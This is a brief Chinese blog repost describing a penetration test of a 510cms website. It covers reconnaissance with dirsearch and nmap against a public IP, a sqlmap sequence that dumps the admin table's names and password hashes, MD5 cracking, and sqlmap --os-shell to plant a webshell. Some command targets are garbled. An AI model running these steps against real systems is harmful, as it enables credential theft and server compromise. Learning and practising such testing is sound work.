510cms网站渗透测试
短信预约 -IT技能 免费直播动态提醒
- 信息收集
- 510cms企业网站系统源码,以PHP+MYSQL+smarty开发的企业网站,后台地址为admin/login.php。
- 使用wappalyzer检测出网站使用的中间件为Apache/2.4.7、使用的PHP版本为php/5.5.9、所用操作系统是Linux。
- 网站是一个动态网站,有明显的传参参数。
- 通过dirsearch -u http://43.138.211.45,可检索到网站一些敏感目录信息。
- Nmap -p3309 -A -T4 -v 43.138.211.45进行扫描,识别端口服务。
3309端口,开放了MySQL数据库
- 漏洞挖掘
- 判断网站存在SQL注入,使用get方式进行传参。
Sqlmap工具(python开发)
- Linux
- Windows
- sqlmap -u 510企业网站系统源码 判断网站是否存在SQL注入
- sqlmap -u 510企业网站系统源码 --batch 默认配置
- sqlmap -u 510企业网站系统源码 --current-db 求当前网站数据库名
510cms
- sqlmap -u 510企业网站系统源码 -D 510cms --tables 指定数据库下所有表
- sqlmap -u 510企业网站系统源码 -D 510cms -T 510_admin --columns 指定数据库下指定表下列名
- sqlmap -u 510企业网站系统源码 -D 510cms -T 510_admin -C name,passwd --dump 指定数据库下指定表下指定列中字段
- 使用MD5解密后登录网站后台
- 使用nmap上传马
sqlmap -u 510企业网站系统源码 --os-shell
进入hack.php查看
可执行相应操作
来源地址:https://blog.csdn.net/AmeV_ll/article/details/128754484
免责声明:
① 本站未注明“稿件来源”的信息均来自网络整理。其文字、图片和音视频稿件的所属权归原作者所有。本站收集整理出于非商业性的教育和科研之目的,并不意味着本站赞同其观点或证实其内容的真实性。仅作为临时的测试数据,供内部测试之用。本站并未授权任何人以任何方式主动获取本站任何信息。
② 本站未注明“稿件来源”的临时测试数据将在测试完成后最终做删除处理。有问题或投稿请发送至: 邮箱/279061341@qq.com QQ/279061341